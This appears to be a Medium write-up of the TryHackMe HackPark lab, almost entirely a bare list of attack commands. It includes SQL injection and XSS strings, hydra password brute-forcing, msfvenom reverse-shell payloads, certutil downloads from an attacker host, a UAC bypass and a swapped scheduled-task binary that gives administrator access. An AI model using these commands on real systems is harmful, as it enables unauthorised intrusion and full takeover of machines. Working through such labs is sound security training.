TryHackMe: HackPark

  1. Deploy the machine and access its web server.
nmap -Pn <ip>
nmap -p1000- -Pn <ip>
nmap -A -p 80,3389 <ip>
nmap -p 80,3389 --script vuln <ip>
  1. What request type is the Windows website login form using?
1' or 1=1--+
<script>alert('XSS')</script>
Reference : https://blogengine.io/support/get-started/
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
echo admin > users.txtecho pennywise >> users.txtcat users.txt
hydra -L  <username list> -P <password list> <ip> http-post-form   "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
  1. Now you have logged into the website, are you able to identify the version of the BlogEngine?
searchsploit blogengine
searchsploit -m 46353
nc -lvp 1234
http://<ip>?theme=../../App_Data/files
whoami
  1. Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
python -m SimpleHTTPServer 80
cd \Windows\Tempcertutil -urlcache -f http://<ip>/shell.exe shell.exedir
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
msfconsoleuse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run
shell.exe
sysinfo
getsystem
run post/multi/recon/local_exploit_suggester
background
use exploit/windows/local/bypassuac_eventvwrset SESSION 1run
shell
winPEAS.exe
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
winPEAS.bat
cd Program Files (x86)cd SystemSchedulerdir
cd Eventsdir
type 20198415519.INI_LOG.txt
cd ..copy Message.exe Message_bak.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
nc -lvp 1236
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
whoami
echo %username%
cd \Users\jeff\Desktopdirtype user.txt
cd \Users\Administrator\Desktoptype root.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CUN Weekly (1.24–2.6)

How to add a module to Metasploit from Exploit-DB

The underlying principle of SQL Injection Attack

Shift Left, Scale Up Security Using Threat Modelling

Application Layer Gateways — Part I

Chaos Communication Congress or the best way to finish the year

Privacy is at risk when security fails

GDPR and Outsourcing

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

How to crack ssh password by hydra:

USDC, USDT, UST on Jupiter

HTB Event Horizon [easy] Forensics Challenge

The Kernel is Calling a Zero(day) Pointer — CVE-2013–5065 — Ring Ring